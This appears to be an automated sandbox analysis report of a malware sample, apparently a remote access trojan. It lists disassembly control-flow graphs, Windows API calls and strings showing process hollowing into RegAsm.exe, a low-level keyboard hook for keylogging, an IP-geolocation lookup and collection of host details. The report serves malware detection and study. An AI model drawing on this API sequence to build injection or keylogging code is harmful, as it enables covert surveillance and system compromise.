4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 480 4183f0-4183f4 478->480 481 4183d2-4183d8 478->481 482 418397-4183ba call 436910 479->482 484 4183f6-418413 WriteProcessMemory 480->484 485 418419-418430 Wow64SetThreadContext 480->485 481->480 483 4183da-4183ed call 418503 481->483 491 4183bc-4183c3 482->491 483->480 484->465 488 418415 484->488 485->465 489 418432-41843e ResumeThread 485->489 488->485 489->465 493 418440-418442 489->493 491->478 493->453
                      APIs
                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                      • GetProcAddress.KERNEL32(00000000), ref: 00418139
                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                      • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                      • GetProcAddress.KERNEL32(00000000), ref: 00418161
                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                      • GetProcAddress.KERNEL32(00000000), ref: 00418175
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                      • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                      • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
                      • NtClose.NTDLL(?), ref: 004182F7
                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                      • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                      • ResumeThread.KERNEL32(?), ref: 00418435
                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                      • GetCurrentProcess.KERNEL32(?), ref: 00418457
                      • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                      • NtClose.NTDLL(?), ref: 00418468
                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                      • GetLastError.KERNEL32 ref: 0041847A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                      • API String ID: 3150337530-3035715614
                      • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                      • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                      • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                      • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1638 40a2b8-40a2cf 1639 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1638->1639 1640 40a333-40a343 GetMessageA 1638->1640 1639->1640 1643 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1639->1643 1641 40a345-40a35d TranslateMessage DispatchMessageA 1640->1641 1642 40a35f 1640->1642 1641->1640 1641->1642 1644 40a361-40a366 1642->1644 1643->1644
                      APIs
                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                      • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                      • GetLastError.KERNEL32 ref: 0040A2ED
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                      • TranslateMessage.USER32(?), ref: 0040A34A
                      • DispatchMessageA.USER32(?), ref: 0040A355
                      Strings
                      • Keylogger initialization failure: error , xrefs: 0040A301
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                      • String ID: Keylogger initialization failure: error
                      • API String ID: 3219506041-952744263
                      • Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                      • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                      • Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                      • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1655 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1662 10001177-1000119e lstrlenW FindFirstFileW 1655->1662 1663 10001168-10001172 lstrlenW 1655->1663 1664 100011a0-100011a8 1662->1664 1665 100011e1-100011e9 1662->1665 1663->1662 1666 100011c7-100011d8 FindNextFileW 1664->1666 1667 100011aa-100011c4 call 10001000 1664->1667 1666->1664 1668 100011da-100011db FindClose 1666->1668 1667->1666 1668->1665
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                      • FindClose.KERNEL32(00000000), ref: 100011DB
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                      • String ID:
                      • API String ID: 1083526818-0
                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1671 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1676 41b3c5-41b3e6 InternetReadFile 1671->1676 1677 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1676->1677 1678 41b40c-41b40f 1676->1678 1677->1678 1680 41b411-41b413 1678->1680 1681 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1678->1681 1680->1676 1680->1681 1685 41b427-41b431 1681->1685
                      APIs
                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                      • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                      • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                      Strings
                      • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleOpen$FileRead
                      • String ID: http://geoplugin.net/json.gp
                      • API String ID: 3121278467-91888290
                      • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                      • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                      • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                      • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                      APIs
                        • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                      • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                        • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                        • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                        • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                      • String ID:
                      • API String ID: 3950776272-0
                      • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                      • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                      • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                      • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                      APIs
                        • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                        • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                        • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                      • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                      • ExitProcess.KERNEL32 ref: 0040F8CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseExitOpenProcessQuerySleepValue
                      • String ID: 5.1.0 Pro$override$pth_unenc
                      • API String ID: 2281282204-182549033
                      • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                      • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                      • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                      • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                      APIs
                      • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                      • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                      Strings
                      • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Create$EventLocalThreadTime
                      • String ID: KeepAlive | Enabled | Timeout:
                      • API String ID: 2532271599-1507639952
                      • Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                      • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                      • Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                      • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                      APIs
                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00F85D60), ref: 00433849
                      • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$Context$AcquireRandomRelease
                      • String ID:
                      • API String ID: 1815803762-0
                      • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                      • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                      • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                      • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                      APIs
                      • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                      • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Name$ComputerUser
                      • String ID:
                      • API String ID: 4229901323-0
                      • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                      • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                      • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                      • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                      APIs
                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                      • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                      • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                      • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 88->94 95 40ec1e-40ec2a call 41b2c3 88->95 93 40eef1 89->93 93->49 94->95 104 40ec33-40ec37 95->104 105 40ec2c-40ec2e 95->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 211 40ee51 190->211 212 40ee44-40ee4f call 436e90 190->212 204->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 295 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->295 290->289 291->295 344 40f101 295->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 295->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 405 40f264-40f26b 401->405 406 40f258-40f262 CreateThread 401->406 410 40f279-40f280 405->410 411 40f26d-40f277 CreateThread 405->411 406->405 412 40f282-40f285 410->412 413 40f28e 410->413 411->410 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                      APIs
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                        • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
